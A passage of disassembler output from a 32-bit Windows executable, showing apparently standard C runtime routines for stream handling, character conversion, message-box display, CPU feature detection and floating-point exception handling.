var_8		= dword	ptr -8
var_4		= byte ptr -4
arg_0		= dword	ptr  8
arg_4		= dword	ptr  0Ch

		push	ebp
		mov	ebp, esp
		sub	esp, 10h
		push	[ebp+arg_4]
		lea	ecx, [ebp+var_10]
		call	sub_402CAD
		mov	eax, [ebp+var_10]
		cmp	dword ptr [eax+0ACh], 1
		jle	short loc_40F817
		lea	eax, [ebp+var_10]
		push	eax
		push	8
		push	[ebp+arg_0]
		call	sub_40D004
		add	esp, 0Ch
		jmp	short loc_40F827
; ---------------------------------------------------------------------------

loc_40F817:				; CODE XREF: sub_40F7E7+1Bj
		mov	eax, [eax+0C8h]
		mov	ecx, [ebp+arg_0]
		movzx	eax, byte ptr [eax+ecx*2]
		and	eax, 8

loc_40F827:				; CODE XREF: sub_40F7E7+2Ej
		cmp	[ebp+var_4], 0
		jz	short locret_40F834
		mov	ecx, [ebp+var_8]
		and	dword ptr [ecx+70h], 0FFFFFFFDh

locret_40F834:				; CODE XREF: sub_40F7E7+44j
		leave
		retn
sub_40F7E7	endp


; =============== S U B	R O U T	I N E =======================================



sub_40F836	proc near		; CODE XREF: sub_409402+17p
					; sub_409427+13Cp ...

arg_0		= dword	ptr  4

		cmp	dword_428140, 0
		jnz	short loc_40F851
		mov	eax, [esp+arg_0]
		mov	ecx, off_424668
		movzx	eax, byte ptr [ecx+eax*2]
		and	eax, 8
		retn
; ---------------------------------------------------------------------------

loc_40F851:				; CODE XREF: sub_40F836+7j
		push	0
		push	[esp+4+arg_0]
		call	sub_40F7E7
		pop	ecx
		pop	ecx
		retn
sub_40F836	endp


; =============== S U B	R O U T	I N E =======================================



sub_40F85F	proc near		; CODE XREF: sub_409427+15Ep
					; sub_409427+5BEp ...

arg_0		= dword	ptr  4
arg_4		= dword	ptr  8

		push	ebx
		push	ebp
		push	esi
		mov	esi, [esp+0Ch+arg_4]
		or	ebp, 0FFFFFFFFh
		test	byte ptr [esi+0Ch], 40h
		push	edi
		jnz	loc_40F91C
		push	esi
		call	sub_408FE0
		cmp	eax, ebp
		pop	ecx
		mov	ebx, offset dword_424BD0
		jz	short loc_40F8B2
		push	esi
		call	sub_408FE0
		cmp	eax, 0FFFFFFFEh
		pop	ecx
		jz	short loc_40F8B2
		push	esi
		call	sub_408FE0
		sar	eax, 5
		push	esi
		lea	edi, ds:437700h[eax*4]
		call	sub_408FE0
		and	eax, 1Fh
		imul	eax, 28h
		add	eax, [edi]
		pop	ecx
		pop	ecx
		jmp	short loc_40F8B4
; ---------------------------------------------------------------------------

loc_40F8B2:				; CODE XREF: sub_40F85F+23j
					; sub_40F85F+2Fj
		mov	eax, ebx

loc_40F8B4:				; CODE XREF: sub_40F85F+51j
		test	byte ptr [eax+24h], 7Fh
		jnz	short loc_40F8FB
		push	esi
		call	sub_408FE0
		cmp	eax, ebp
		pop	ecx
		jz	short loc_40F8F3
		push	esi
		call	sub_408FE0
		cmp	eax, 0FFFFFFFEh
		pop	ecx
		jz	short loc_40F8F3
		push	esi
		call	sub_408FE0
		sar	eax, 5
		push	esi
		lea	edi, ds:437700h[eax*4]
		call	sub_408FE0
		and	eax, 1Fh
		imul	eax, 28h
		add	eax, [edi]
		pop	ecx
		pop	ecx
		jmp	short loc_40F8F5
; ---------------------------------------------------------------------------

loc_40F8F3:				; CODE XREF: sub_40F85F+64j
					; sub_40F85F+70j
		mov	eax, ebx

loc_40F8F5:				; CODE XREF: sub_40F85F+92j
		test	byte ptr [eax+24h], 80h
		jz	short loc_40F91C

loc_40F8FB:				; CODE XREF: sub_40F85F+59j
		call	sub_405D93
		xor	edi, edi
		push	edi
		push	edi
		push	edi
		push	edi
		push	edi
		mov	dword ptr [eax], 16h
		call	sub_4034C7
		add	esp, 14h

loc_40F915:				; CODE XREF: sub_40F85F+C3j
					; sub_40F85F+CEj ...
		mov	eax, ebp

loc_40F917:				; CODE XREF: sub_40F85F+11Cj
		pop	edi
		pop	esi
		pop	ebp
		pop	ebx
		retn
; ---------------------------------------------------------------------------

loc_40F91C:				; CODE XREF: sub_40F85F+Fj
					; sub_40F85F+9Aj
		mov	ebx, [esp+10h+arg_0]
		cmp	ebx, ebp
		jz	short loc_40F915
		mov	eax, [esi+0Ch]
		test	al, 1
		jnz	short loc_40F933
		test	al, al
		jns	short loc_40F915
		test	al, 2
		jnz	short loc_40F915

loc_40F933:				; CODE XREF: sub_40F85F+CAj
		xor	edi, edi
		cmp	[esi+8], edi
		jnz	short loc_40F941
		push	esi
		call	sub_40DABC
		pop	ecx

loc_40F941:				; CODE XREF: sub_40F85F+D9j
		mov	eax, [esi]
		cmp	eax, [esi+8]
		jnz	short loc_40F950
		cmp	[esi+4], edi
		jnz	short loc_40F915
		inc	eax
		mov	[esi], eax

loc_40F950:				; CODE XREF: sub_40F85F+E7j
		dec	dword ptr [esi]
		test	byte ptr [esi+0Ch], 40h
		mov	eax, [esi]
		jz	short loc_40F963
		cmp	[eax], bl
		jz	short loc_40F965
		inc	eax
		mov	[esi], eax
		jmp	short loc_40F915
; ---------------------------------------------------------------------------

loc_40F963:				; CODE XREF: sub_40F85F+F9j
		mov	[eax], bl

loc_40F965:				; CODE XREF: sub_40F85F+FDj
		mov	eax, [esi+0Ch]
		inc	dword ptr [esi+4]
		and	eax, 0FFFFFFEFh
		or	eax, 1
		mov	[esi+0Ch], eax
		mov	eax, ebx
		and	eax, 0FFh
		jmp	short loc_40F917
sub_40F85F	endp


; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame


sub_40F97D	proc near		; CODE XREF: sub_409427+6FFp
					; sub_40FA90+Ep

var_10		= dword	ptr -10h
var_8		= dword	ptr -8
var_4		= byte ptr -4
arg_0		= dword	ptr  8
arg_4		= dword	ptr  0Ch
arg_8		= dword	ptr  10h
arg_C		= dword	ptr  14h

		push	ebp
		mov	ebp, esp
		sub	esp, 10h
		push	ebx
		push	esi
		mov	esi, [ebp+arg_4]
		xor	ebx, ebx
		cmp	esi, ebx
		jz	short loc_40F9A1
		cmp	[ebp+arg_8], ebx
		jz	short loc_40F9A1
		cmp	[esi], bl
		jnz	short loc_40F9A7
		mov	eax, [ebp+arg_0]
		cmp	eax, ebx
		jz	short loc_40F9A1
		mov	[eax], bx

loc_40F9A1:				; CODE XREF: sub_40F97D+Fj
					; sub_40F97D+14j ...
		xor	eax, eax

loc_40F9A3:				; CODE XREF: sub_40F97D+5Aj
					; sub_40F97D+BBj ...
		pop	esi
		pop	ebx
		leave
		retn
; ---------------------------------------------------------------------------

loc_40F9A7:				; CODE XREF: sub_40F97D+18j
		push	[ebp+arg_C]
		lea	ecx, [ebp+var_10]
		call	sub_402CAD
		mov	eax, [ebp+var_10]
		cmp	[eax+14h], ebx
		jnz	short loc_40F9D9
		mov	eax, [ebp+arg_0]
		cmp	eax, ebx
		jz	short loc_40F9C8
		movzx	cx, byte ptr [esi]
		mov	[eax], cx

loc_40F9C8:				; CODE XREF: sub_40F97D+42j
					; sub_40F97D+10Bj
		cmp	[ebp+var_4], bl
		jz	short loc_40F9D4
		mov	eax, [ebp+var_8]
		and	dword ptr [eax+70h], 0FFFFFFFDh

loc_40F9D4:				; CODE XREF: sub_40F97D+4Ej
		xor	eax, eax
		inc	eax
		jmp	short loc_40F9A3
; ---------------------------------------------------------------------------

loc_40F9D9:				; CODE XREF: sub_40F97D+3Bj
		lea	eax, [ebp+var_10]
		push	eax
		movzx	eax, byte ptr [esi]
		push	eax
		call	sub_40CFC0
		test	eax, eax
		pop	ecx
		pop	ecx
		jz	short loc_40FA69
		mov	eax, [ebp+var_10]
		mov	ecx, [eax+0ACh]
		cmp	ecx, 1
		jle	short loc_40FA1F
		cmp	[ebp+arg_8], ecx
		jl	short loc_40FA1F
		xor	edx, edx
		cmp	[ebp+arg_0], ebx
		setnz	dl
		push	edx
		push	[ebp+arg_0]
		push	ecx
		push	esi
		push	9
		push	dword ptr [eax+4]
		call	ds:dword_41E0A0	; MultiByteToWideChar
		test	eax, eax
		mov	eax, [ebp+var_10]
		jnz	short loc_40FA2F

loc_40FA1F:				; CODE XREF: sub_40F97D+7Bj
					; sub_40F97D+80j
		mov	ecx, [ebp+arg_8]
		cmp	ecx, [eax+0ACh]
		jb	short loc_40FA4A
		cmp	[esi+1], bl
		jz	short loc_40FA4A

loc_40FA2F:				; CODE XREF: sub_40F97D+A0j
		cmp	[ebp+var_4], bl
		mov	eax, [eax+0ACh]
		jz	loc_40F9A3
		mov	ecx, [ebp+var_8]
		and	dword ptr [ecx+70h], 0FFFFFFFDh
		jmp	loc_40F9A3
; ---------------------------------------------------------------------------

loc_40FA4A:				; CODE XREF: sub_40F97D+ABj
					; sub_40F97D+B0j ...
		call	sub_405D93
		mov	dword ptr [eax], 2Ah
		cmp	[ebp+var_4], bl
		jz	short loc_40FA61
		mov	eax, [ebp+var_8]
		and	dword ptr [eax+70h], 0FFFFFFFDh

loc_40FA61:				; CODE XREF: sub_40F97D+DBj
		or	eax, 0FFFFFFFFh
		jmp	loc_40F9A3
; ---------------------------------------------------------------------------

loc_40FA69:				; CODE XREF: sub_40F97D+6Dj
		xor	eax, eax
		cmp	[ebp+arg_0], ebx
		setnz	al
		push	eax
		push	[ebp+arg_0]
		mov	eax, [ebp+var_10]
		push	1
		push	esi
		push	9
		push	dword ptr [eax+4]
		call	ds:dword_41E0A0	; MultiByteToWideChar
		test	eax, eax
		jnz	loc_40F9C8
		jmp	short loc_40FA4A
sub_40F97D	endp


; =============== S U B	R O U T	I N E =======================================



sub_40FA90	proc near		; CODE XREF: sub_40D41A+18Ep
					; sub_40D41A+1BCp

arg_0		= dword	ptr  4
arg_4		= dword	ptr  8
arg_8		= dword	ptr  0Ch

		push	0
		push	[esp+4+arg_8]
		push	[esp+8+arg_4]
		push	[esp+0Ch+arg_0]
		call	sub_40F97D
		add	esp, 10h
		retn
sub_40FA90	endp

; ---------------------------------------------------------------------------
		align 10h

; =============== S U B	R O U T	I N E =======================================



sub_40FAB0	proc near		; CODE XREF: sub_409427+9CFp

arg_0		= dword	ptr  4
arg_4		= dword	ptr  8
arg_8		= dword	ptr  0Ch
arg_C		= dword	ptr  10h

		mov	eax, [esp+arg_4]
		mov	ecx, [esp+arg_C]
		or	ecx, eax
		mov	ecx, [esp+arg_8]
		jnz	short loc_40FAC9
		mov	eax, [esp+arg_0]
		mul	ecx
		retn	10h
; ---------------------------------------------------------------------------

loc_40FAC9:				; CODE XREF: sub_40FAB0+Ej
		push	ebx
		mul	ecx
		mov	ebx, eax
		mov	eax, [esp+4+arg_0]
		mul	[esp+4+arg_C]
		add	ebx, eax
		mov	eax, [esp+4+arg_0]
		mul	ecx
		add	edx, ebx
		pop	ebx
		retn	10h
sub_40FAB0	endp


; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame


sub_40FAE4	proc near		; CODE XREF: sub_40A074+15Dp

var_30		= dword	ptr -30h
var_20		= byte ptr -20h
var_18		= byte ptr -18h
var_14		= byte ptr -14h
var_10		= dword	ptr -10h
var_C		= dword	ptr -0Ch
var_8		= dword	ptr -8
var_4		= dword	ptr -4
arg_0		= dword	ptr  8
arg_4		= dword	ptr  0Ch
arg_8		= dword	ptr  10h

		push	ebp
		mov	ebp, esp
		sub	esp, 20h
		push	ebx
		push	esi
		push	edi
		call	sub_40574A
		xor	ebx, ebx
		cmp	dword_4287E8, ebx
		mov	[ebp+var_10], eax
		mov	[ebp+var_4], ebx
		mov	[ebp+var_8], ebx
		mov	[ebp+var_C], ebx
		jnz	loc_40FBB9
		push	offset aUser32_dll_0 ; "USER32.DLL"
		call	ds:off_41E0E4
		mov	edi, eax
		cmp	edi, ebx
		jnz	short loc_40FB24

loc_40FB1D:				; CODE XREF: sub_40FAE4+50j
		xor	eax, eax
		jmp	loc_40FC7D
; ---------------------------------------------------------------------------

loc_40FB24:				; CODE XREF: sub_40FAE4+37j
		mov	esi, ds:off_41E0E8
		push	offset aMessageboxa ; "MessageBoxA"
		push	edi
		call	esi ; sub_457FDC
		cmp	eax, ebx
		jz	short loc_40FB1D
		push	eax
		call	sub_4056E7
		mov	[esp+30h+var_30], offset aGetactivewindo ; "GetActiveWindow"
		push	edi
		mov	dword_4287E8, eax
		call	esi ; sub_457FDC
		push	eax
		call	sub_4056E7
		mov	[esp+30h+var_30], offset aGetlastactivep ; "GetLastActivePopup"
		push	edi
		mov	dword_4287EC, eax
		call	esi ; sub_457FDC
		push	eax
		call	sub_4056E7
		mov	dword_4287F0, eax
		lea	eax, [ebp+var_8]
		push	eax
		call	sub_407EC6
		test	eax, eax
		pop	ecx
		pop	ecx
		jz	short loc_40FB87
		push	ebx
		push	ebx
		push	ebx
		push	ebx
		push	ebx
		call	sub_4033CB
		add	esp, 14h

loc_40FB87:				; CODE XREF: sub_40FAE4+94j
		cmp	[ebp+var_8], 2
		jnz	short loc_40FBB9
		push	offset aGetuserobjecti ; "GetUserObjectInformationA"
		push	edi
		call	esi ; sub_457FDC
		push	eax
		call	sub_4056E7
		cmp	eax, ebx
		pop	ecx
		mov	dword_4287F8, eax
		jz	short loc_40FBB9
		push	offset aGetprocesswind ; "GetProcessWindowStation"
		push	edi
		call	esi ; sub_457FDC
		push	eax
		call	sub_4056E7
		pop	ecx
		mov	dword_4287F4, eax

loc_40FBB9:				; CODE XREF: sub_40FAE4+22j
					; sub_40FAE4+A7j ...
		mov	eax, dword_4287F4
		mov	esi, [ebp+var_10]
		cmp	eax, esi
		jz	short loc_40FC32
		cmp	dword_4287F8, esi
		jz	short loc_40FC32
		push	eax
		call	sub_405753
		pop	ecx
		call	eax
		cmp	eax, ebx
		jz	short loc_40FBFF
		lea	ecx, [ebp+var_14]
		push	ecx
		push	0Ch
		lea	ecx, [ebp+var_20]
		push	ecx
		push	1
		push	eax
		push	dword_4287F8
		call	sub_405753
		pop	ecx
		call	eax
		test	eax, eax
		jz	short loc_40FBFF
		test	[ebp+var_18], 1
		jnz	short loc_40FC32

loc_40FBFF:				; CODE XREF: sub_40FAE4+F4j
					; sub_40FAE4+113j
		lea	eax, [ebp+var_C]
		push	eax
		call	sub_407EFD
		test	eax, eax
		pop	ecx
		jz	short loc_40FC1A
		push	ebx
		push	ebx
		push	ebx
		push	ebx
		push	ebx
		call	sub_4033CB
		add	esp, 14h

loc_40FC1A:				; CODE XREF: sub_40FAE4+127j
		cmp	[ebp+var_C], 4
		jb	short loc_40FC29
		or	[ebp+arg_8], 200000h
		jmp	short loc_40FC63
; ---------------------------------------------------------------------------

loc_40FC29:				; CODE XREF: sub_40FAE4+13Aj
		or	[ebp+arg_8], 40000h
		jmp	short loc_40FC63
; ---------------------------------------------------------------------------

loc_40FC32:				; CODE XREF: sub_40FAE4+DFj
					; sub_40FAE4+E7j ...
		mov	eax, dword_4287EC
		cmp	eax, esi
		jz	short loc_40FC63
		push	eax
		call	sub_405753
		pop	ecx
		call	eax
		cmp	eax, ebx
		mov	[ebp+var_4], eax
		jz	short loc_40FC63
		mov	eax, dword_4287F0
		cmp	eax, esi
		jz	short loc_40FC63
		push	[ebp+var_4]
		push	eax
		call	sub_405753
		pop	ecx
		call	eax
		mov	[ebp+var_4], eax

loc_40FC63:				; CODE XREF: sub_40FAE4+143j
					; sub_40FAE4+14Cj ...
		push	[ebp+arg_8]
		push	[ebp+arg_4]
		push	[ebp+arg_0]
		push	[ebp+var_4]
		push	dword_4287E8
		call	sub_405753
		pop	ecx
		call	eax

loc_40FC7D:				; CODE XREF: sub_40FAE4+3Bj
		pop	edi
		pop	esi
		pop	ebx
		leave
		retn
sub_40FAE4	endp


; =============== S U B	R O U T	I N E =======================================



sub_40FC82	proc near		; CODE XREF: sub_40A074+27p
					; sub_40A074+38p ...

arg_0		= dword	ptr  4

		mov	ecx, [esp+arg_0]
		push	esi
		xor	esi, esi
		cmp	ecx, esi
		jl	short loc_40FCAB
		cmp	ecx, 2
		jle	short loc_40FC9E
		cmp	ecx, 3
		jnz	short loc_40FCAB
		mov	eax, dword_427DFC
		pop	esi
		retn
; ---------------------------------------------------------------------------

loc_40FC9E:				; CODE XREF: sub_40FC82+Ej
		mov	eax, dword_427DFC
		mov	dword_427DFC, ecx
		pop	esi
		retn
; ---------------------------------------------------------------------------

loc_40FCAB:				; CODE XREF: sub_40FC82+9j
					; sub_40FC82+13j
		call	sub_405D93
		push	esi
		push	esi
		push	esi
		push	esi
		push	esi
		mov	dword ptr [eax], 16h
		call	sub_4034C7
		add	esp, 14h
		or	eax, 0FFFFFFFFh
		pop	esi
		retn
sub_40FC82	endp


; =============== S U B	R O U T	I N E =======================================



sub_40FCC8	proc near		; CODE XREF: sub_410316+5Fp
					; DATA XREF: sub_40AC3F:loc_40AC81o
		xor	eax, eax
		retn
sub_40FCC8	endp


; =============== S U B	R O U T	I N E =======================================



sub_40FCCB	proc near		; CODE XREF: sub_40FD2Bp
		mov	eax, offset sub_41190A
		mov	off_424F80, eax
		mov	off_424F84, offset sub_411006
		mov	off_424F88, offset sub_410FC4
		mov	off_424F8C, offset sub_410FF8
		mov	off_424F90, offset word_410F6E
		mov	off_424F94, eax
		mov	off_424F98, offset sub_411884
		mov	off_424F9C, offset sub_410F84
		mov	off_424FA0, offset sub_410EEE
		mov	off_424FA4, offset sub_410E7D
		retn
sub_40FCCB	endp


; =============== S U B	R O U T	I N E =======================================



sub_40FD2B	proc near		; CODE XREF: sub_407F39+1Cp
					; DATA XREF: jlrllt49:off_41FDB4o

arg_0		= dword	ptr  4

		call	sub_40FCCB
		call	sub_411990
		cmp	[esp+arg_0], 0
		mov	dword_428800, eax
		jz	short loc_40FD46
		call	sub_41192B

loc_40FD46:				; CODE XREF: sub_40FD2B+14j
		fnclex
		retn
sub_40FD2B	endp


; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame


sub_40FD49	proc near		; CODE XREF: sub_40FD99+4Dp

var_1C		= dword	ptr -1Ch
ms_exc		= CPPEH_RECORD ptr -18h

		push	0Ch
		push	offset dword_422E58
		call	__SEH_prolog4
		and	[ebp+ms_exc.disabled], 0
		movapd	xmm0, xmm1
		mov	[ebp+var_1C], 1
		jmp	short loc_40FD89
; ---------------------------------------------------------------------------
		mov	eax, [ebp+ms_exc.exc_ptr]
		mov	eax, [eax]
		mov	eax, [eax]
		cmp	eax, 0C0000005h
		jz	short loc_40FD7E
		cmp	eax, 0C000001Dh
		jz	short loc_40FD7E
		xor	eax, eax
		retn
; ---------------------------------------------------------------------------

loc_40FD7E:				; CODE XREF: sub_40FD49+29j
					; sub_40FD49+30j
		xor	eax, eax
		inc	eax
		retn
; ---------------------------------------------------------------------------
		mov	esp, [ebp+ms_exc.old_esp]
		and	[ebp+var_1C], 0

loc_40FD89:				; CODE XREF: sub_40FD49+1Bj
		mov	[ebp+ms_exc.disabled], 0FFFFFFFEh
		mov	eax, [ebp+var_1C]
		call	__SEH_epilog4
		retn
sub_40FD49	endp ; sp-analysis failed


; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame


sub_40FD99	proc near		; CODE XREF: sub_40AEEF+7p sub_40FDF9p

var_18		= dword	ptr -18h
var_14		= dword	ptr -14h
var_10		= dword	ptr -10h
var_C		= dword	ptr -0Ch
var_8		= dword	ptr -8
var_4		= dword	ptr -4

		push	ebp
		mov	ebp, esp
		sub	esp, 18h
		xor	eax, eax
		push	ebx
		mov	[ebp+var_4], eax
		mov	[ebp+var_C], eax
		mov	[ebp+var_8], eax
		push	ebx
		pushf
		pop	eax
		mov	ecx, eax
		xor	eax, 200000h
		push	eax
		popf
		pushf
		pop	edx
		sub	edx, ecx
		jz	short loc_40FDDC
		push	ecx
		popf
		xor	eax, eax
		cpuid
		mov	[ebp+var_C], eax
		mov	[ebp+var_18], ebx
		mov	[ebp+var_14], edx
		mov	[ebp+var_10], ecx
		mov	eax, 1
		cpuid
		mov	[ebp+var_4], edx
		mov	[ebp+var_8], eax

loc_40FDDC:				; CODE XREF: sub_40FD99+22j
		pop	ebx
		test	[ebp+var_4], 4000000h
		jz	short loc_40FDF4
		call	sub_40FD49
		test	eax, eax
		jz	short loc_40FDF4
		xor	eax, eax
		inc	eax
		jmp	short loc_40FDF6
; ---------------------------------------------------------------------------

loc_40FDF4:				; CODE XREF: sub_40FD99+4Bj
					; sub_40FD99+54j
		xor	eax, eax

loc_40FDF6:				; CODE XREF: sub_40FD99+59j
		pop	ebx
		leave
		retn
sub_40FD99	endp


; =============== S U B	R O U T	I N E =======================================



sub_40FDF9	proc near		; DATA XREF: jlrllt49:0041E2F0o
		call	sub_40FD99
		mov	dword_4376DC, eax
		xor	eax, eax
		retn
sub_40FDF9	endp


; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame


sub_40FE06	proc near		; CODE XREF: sub_410407+4Ap

arg_0		= dword	ptr  8
arg_4		= dword	ptr  0Ch
arg_8		= dword	ptr  10h
arg_C		= dword	ptr  14h
arg_10		= dword	ptr  18h
arg_14		= dword	ptr  1Ch
arg_18		= dword	ptr  20h

		push	ebp
		mov	ebp, esp
		mov	eax, [ebp+arg_0]
		mov	cl, byte ptr [ebp+arg_8]
		push	ebx
		push	esi
		push	edi
		xor	edi, edi
		mov	[eax+4], edi
		mov	eax, [ebp+arg_0]
		xor	ebx, ebx
		mov	[eax+8], edi
		mov	eax, [ebp+arg_0]
		inc	ebx
		test	cl, 10h
		mov	[eax+0Ch], edi
		jz	short loc_40FE38
		mov	eax, [ebp+arg_0]
		or	[eax+4], ebx
		mov	[ebp+arg_8], 0C000008Fh

loc_40FE38:				; CODE XREF: sub_40FE06+23j
		test	cl, 2
		jz	short loc_40FE4B
		mov	eax, [ebp+arg_0]
		or	dword ptr [eax+4], 2
		mov	[ebp+arg_8], 0C0000093h

loc_40FE4B:				; CODE XREF: sub_40FE06+35j
		test	cl, bl
		jz	short loc_40FE5D
		mov	eax, [ebp+arg_0]
		or	dword ptr [eax+4], 4
		mov	[ebp+arg_8], 0C0000091h

loc_40FE5D:				; CODE XREF: sub_40FE06+47j
		test	cl, 4
		jz	short loc_40FE70
		mov	eax, [ebp+arg_0]
		or	dword ptr [eax+4], 8
		mov	[ebp+arg_8], 0C000008Eh

loc_40FE70:				; CODE XREF: sub_40FE06+5Aj
		test	cl, 8
		jz	short loc_40FE83
		mov	eax, [ebp+arg_0]
		or	dword ptr [eax+4], 10h
		mov	[ebp+arg_8], 0C0000090h

loc_40FE83:				; CODE XREF: sub_40FE06+6Dj
		mov	esi, [ebp+arg_4]
		mov	ecx, [esi]
		mov	eax, [ebp+arg_0]
		shl	ecx, 4
		not	ecx
		xor	ecx, [eax+8]
		and	ecx, 10h
		xor	[eax+8], ecx
		mov	ecx, [esi]
		mov	eax, [ebp+arg_0]
		add	ecx, ecx
		not	ecx
		xor	ecx, [eax+8]
		and	ecx, 8
		xor	[eax+8], ecx
		mov	ecx, [esi]
		mov	eax, [ebp+arg_0]
		shr	ecx, 1
		not	ecx
		xor	ecx, [eax+8]
		and	ecx, 4
		xor	[eax+8], ecx
		mov	ecx, [esi]
		mov	eax, [ebp+arg_0]
		shr	ecx, 3
		not	ecx
		xor	ecx, [eax+8]
		and	ecx, 2
		xor	[eax+8], ecx
		mov	ecx, [esi]
		mov	eax, [ebp+arg_0]
		shr	ecx, 5
		not	ecx
		xor	ecx, [eax+8]
		and	ecx, ebx
		xor	[eax+8], ecx
		call	sub_410606
		test	al, bl
		jz	short loc_40FEF2
		mov	ecx, [ebp+arg_0]
		or	dword ptr [ecx+0Ch], 10h

loc_40FEF2:				; CODE XREF: sub_40FE06+E3j
		test	al, 4
		jz	short loc_40FEFD
		mov	ecx, [ebp+arg_0]
		or	dword ptr [ecx+0Ch], 8

loc_40FEFD:				; CODE XREF: sub_40FE06+EEj
		test	al, 8
		jz	short loc_40FF08
		mov	ecx, [ebp+arg_0]
		or	dword ptr [ecx+0Ch], 4

loc_40FF08:				; CODE XREF: sub_40FE06+F9j
		test	al, 10h
		jz	short loc_40FF13
		mov	ecx, [ebp+arg_0]
		or	dword ptr [ecx+0Ch], 2

loc_40FF13:				; CODE XREF: sub_40FE06+104j
		test	al, 20h
		jz	short loc_40FF1D
		mov	eax, [ebp+arg_0]
		or	[eax+0Ch], ebx

loc_40FF1D:				; CODE XREF: sub_40FE06+10Fj
		mov	eax, [esi]
		mov	ecx, 0C00h
		and	eax, ecx
		jz	short loc_40FF5D
		cmp	eax, 400h
		jz	short loc_40FF51
		cmp	eax, 800h
		jz	short loc_40FF42
		cmp	eax, ecx
		jnz	short loc_40FF63
		mov	eax, [ebp+arg_0]
		or	dword ptr [eax], 3
		jmp	short loc_40FF63
; ---------------------------------------------------------------------------

loc_40FF42:				; CODE XREF: sub_40FE06+12Ej
		mov	eax, [ebp+arg_0]
		mov	ecx, [eax]
		and	ecx, 0FFFFFFFEh
		or	ecx, 2

loc_40FF4D:				; CODE XREF: sub_40FE06+155j
		mov	[eax], ecx
		jmp	short loc_40FF63
; ---------------------------------------------------------------------------

loc_40FF51:				; CODE XREF: sub_40FE06+127j
		mov	eax, [ebp+arg_0]
		mov	ecx, [eax]
		and	ecx, 0FFFFFFFDh
		or	ecx, ebx
		jmp	short loc_40FF4D
; ---------------------------------------------------------------------------

loc_40FF5D:				; CODE XREF: sub_40FE06+120j
		mov	eax, [ebp+arg_0]
		and	dword ptr [eax], 0FFFFFFFCh

loc_40FF63:				; CODE XREF: sub_40FE06+132j
					; sub_40FE06+13Aj ...
		mov	eax, [esi]
		mov	ecx, 300h
		and	eax, ecx
		jz	short loc_40FF8E
		cmp	eax, 200h
		jz	short loc_40FF81
		cmp	eax, ecx
		jnz	short loc_40FF9B
		mov	eax, [ebp+arg_0]
		and	dword ptr [eax], 0FFFFFFE3h
		jmp	short loc_40FF9B
; ---------------------------------------------------------------------------

loc_40FF81:				; CODE XREF: sub_40FE06+16Dj
		mov	eax, [ebp+arg_0]
		mov	ecx, [eax]
		and	ecx, 0FFFFFFE7h
		or	ecx, 4
		jmp	short loc_40FF99
; ---------------------------------------------------------------------------

loc_40FF8E:				; CODE XREF: sub_40FE06+166j
		mov	eax, [ebp+arg_0]
		mov	ecx, [eax]
		and	ecx, 0FFFFFFEBh
		or	ecx, 8

loc_40FF99:				; CODE XREF: sub_40FE06+186j
		mov	[eax], ecx

loc_40FF9B:				; CODE XREF: sub_40FE06+171j
					; sub_40FE06+179j
		mov	eax, [ebp+arg_0]
		mov	ecx, [ebp+arg_C]
		shl	ecx, 5
		xor	ecx, [eax]
		and	ecx, 1FFE0h
		xor	[eax], ecx
		mov	eax, [ebp+arg_0]
		or	[eax+20h], ebx
		cmp	[ebp+arg_18], edi
		mov	eax, [ebp+arg_0]
		mov	edi, [ebp+arg_14]
		jz	short loc_40FFE5
		and	dword ptr [eax+20h], 0FFFFFFE1h
		mov	eax, [ebp+arg_10]
		fld	dword ptr [eax]
		mov	eax, [ebp+arg_0]
		fstp	dword ptr [eax+10h]
		mov	eax, [ebp+arg_0]
		or	[eax+60h], ebx
		mov	eax, [ebp+arg_0]
		and	dword ptr [eax+60h], 0FFFFFFE1h
		fld	dword ptr [edi]
		mov	eax, [ebp+arg_0]
		fstp	dword ptr [eax+50h]
		jmp	short loc_410019
; ---------------------------------------------------------------------------

loc_40FFE5:				; CODE XREF: sub_40FE06+1B7j
		mov	ecx, [eax+20h]
		and	ecx, 0FFFFFFE3h
		or	ecx, 2
		mov	[eax+20h], ecx
		mov	eax, [ebp+arg_10]
		fld	qword ptr [eax]
		mov	eax, [ebp+arg_0]
		fstp	qword ptr [eax+10h]
		mov	eax, [ebp+arg_0]
		or	[eax+60h], ebx
		mov	eax, [ebp+arg_0]
		mov	ecx, [eax+60h]
		and	ecx, 0FFFFFFE3h
		or	ecx, 2
		mov	[eax+60h], ecx
		fld	qword ptr [edi]
		mov	eax, [ebp+arg_0]
		fstp	qword ptr [eax+50h]

loc_410019:				; CODE XREF: sub_40FE06+1DDj
		call	sub_410611
		lea	eax, [ebp+arg_0]
		push	eax
		push	ebx
		push	0
		push	[ebp+arg_8]
		call	ds:off_41E1AC
		mov	ecx, [ebp+arg_0]
		test	byte ptr [ecx+8], 10h
		jz	short loc_41003A
		and	dword ptr [esi], 0FFFFFFFEh

loc_41003A:				; CODE XREF: sub_40FE06+22Fj
		test	byte ptr [ecx+8], 8
		jz	short loc_410043
		and	dword ptr [esi], 0FFFFFFFBh

loc_410043:				; CODE XREF: sub_40FE06+238j
		test	byte ptr [ecx+8], 4
		jz	short loc_41004C
		and	dword ptr [esi], 0FFFFFFF7h

loc_41004C:				; CODE XREF: sub_40FE06+241j
		test	byte ptr [ecx+8], 2
		jz	short loc_410055
		and	dword ptr [esi], 0FFFFFFEFh

loc_410055:				; CODE XREF: sub_40FE06+24Aj
		test	[ecx+8], bl
		jz	short loc_41005D
		and	dword ptr [esi], 0FFFFFFDFh

loc_41005D:				; CODE XREF: sub_40FE06+252j
		mov	eax, [ecx]
		and	eax, 3
		xor	ebx, ebx
		sub	eax, ebx
		mov	edx, 0FFFFF3FFh
		jz	short loc_41009C
		dec	eax
		jz	short loc_41008E
		dec	eax
		jz	short loc_41007E
		dec	eax
		jnz	short loc_41009E
		or	dword ptr [esi], 0C00h
		jmp	short loc_41009E
; ---------------------------------------------------------------------------

loc_41007E:				; CODE XREF: sub_40FE06+26Bj
		mov	eax, [esi]
		and	eax, 0FFFFFBFFh
		or	eax, 800h

loc_41008A:				; CODE XREF: sub_40FE06+294j
		mov	[esi], eax
		jmp	short loc_41009E
; ---------------------------------------------------------------------------

loc_41008E:				; CODE XREF: sub_40FE06+268j
		mov	eax, [esi]
		and	eax, 0FFFFF7FFh
		or	eax, 400h
		jmp	short loc_41008A
; ---------------------------------------------------------------------------

loc_41009C:				; CODE XREF: sub_40FE06+265j
		and	[esi], edx

